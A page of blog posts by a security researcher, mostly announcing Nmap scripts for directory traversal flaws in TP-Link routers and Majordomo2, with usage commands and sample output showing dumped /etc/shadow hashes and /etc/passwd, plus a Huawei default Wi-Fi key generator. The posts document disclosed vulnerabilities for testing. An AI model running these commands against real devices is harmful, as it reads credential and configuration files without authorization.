Code

bcbus goes open source

by calderpwn on Sat, Sep 01 2012 15:40:00

BCBus is an Android application I developed to have BCTransit's schedules on my phone for offline access. BCBus is my first Android project and a very important part of my learning experience with the Android OS as I had to play around with layouts, intents, async tasks, row views, sqlite interaction and memory optimization.

Going open-source

I've been living in México for over a year now and I simply no longer have the required time to maintain and update this application. For this reason I'd like to share the code with the world and maybe someone will find it useful and learn from it. I also encourage anyone who might be interested in picking up this project to reach out to me for more information.

Existing paid users

Since it wouldn't be fair to you, I will keep up to date the schedules of your current cities. Please contact me to let me know if you are having issues with some of the schedules.

Github repository

BCBUS on GitHUB

Special credits

  • Renata Gomez for helping me with the dashboard icons

  • Guenther Beyer from androidicons.com for helping me with the design of an awesome icon and graphics for the dashboard

  • CBC for interviewing me on one of their radio shows and help me spread the word.

Posted in Announcements, Code | 21 Comments

http-tplink-dir-traversal

by Paulino Calderon on Tue, Jul 10 2012 05:18:00

I wrote a NSE script to exploit a path traversal vulnerability in several TP-Link access points.

description = [[
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate
any help confirming the vulnerability in other models.
Advisory:
* http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
Other interesting files:
* /tmp/topology.cnf (Wireless configuration)
* /tmp/ath0.ap_bss (Wireless encryption key)
]]
---
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>
--
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-tplink-dir-traversal:
-- | VULNERABLE:
-- | Path traversal vulnerability in several TP-Link wireless routers
-- | State: VULNERABLE (Exploitable)
-- | Description:
-- | Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
-- | This vulnerability can be exploited remotely and without authenticatication.
-- | Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
-- | Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
-- | Disclosure date: 2012-06-18
-- | Extra information:
-- | /etc/shadow :
-- |
-- | root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- | Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- | bin::10933:0:99999:7:::
-- | daemon::10933:0:99999:7:::
-- | adm::10933:0:99999:7:::
-- | lp:*:10933:0:99999:7:::
-- | sync:*:10933:0:99999:7:::
-- | shutdown:*:10933:0:99999:7:::
-- | halt:*:10933:0:99999:7:::
-- | uucp:*:10933:0:99999:7:::
-- | operator:*:10933:0:99999:7:::
-- | nobody::10933:0:99999:7:::
-- | ap71::10933:0:99999:7:::
-- |
-- | References:
-- |_ http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
--
-- @args http-tplink-dir-traversal.rfile Remote file to download. Default: /etc/passwd
-- @args http-tplink-dir-traversal.outfile If set it saves the remote file to this location.

 

Resources 

http-tplink-dir-traversal on Github

dotdotpwn log

Posted in Nmap, Code | 2 Comments

Exploiting Majordomo2 with Nmap

by Paulino Calderon on Tue, Jun 28 2011 18:42:00

This is my nmap script http-majordomo2-dir-traversal, it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it  Smile

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT STATE SERVICE 

  80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
| 
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri - URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile - If set it saves the remote file to this location.

 

Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse

Posted in Nmap, Code, Web security | 14 Comments

WhatAreMyHosts.com - IP to hostnames

by Paulino Calderon on Sat, Jun 04 2011 06:11:00

I created a small web application that uses Bing's results to list all the hostnames pointing to an IP address. This is useful for pentesting services like HTTP servers that behave according to the hostname used. Don't abuse it ;) 

 http://whataremyhosts.com 

Posted in Web security, Code | Leave a comment

WEP/WPA key generator for Huawei gateways

by Paulino Calderon on Sat, Jan 22 2011 00:43:00

We are proud to release our WEP/WPA default key generator for Huawei HG520x and HG530 Gateways. These devices use a weak cipher to generate their default keys and Humberto Ochoa, one of our vulnerability researchers at Websec, did a great job deciphering the algorithm:

Mac2wepkey - WEP/WPA default key generator for Huawei HG250x and HG530 Gateways

Ironically, Prodigy Telmex, the biggest ISP in Mexico, just replaced my old 2wire router with one of these vulnerable modems, a newer and "better" device (According to their technician of course hehe). 

Posted in Code, Advisories, Web security | 16 Comments
1 | 2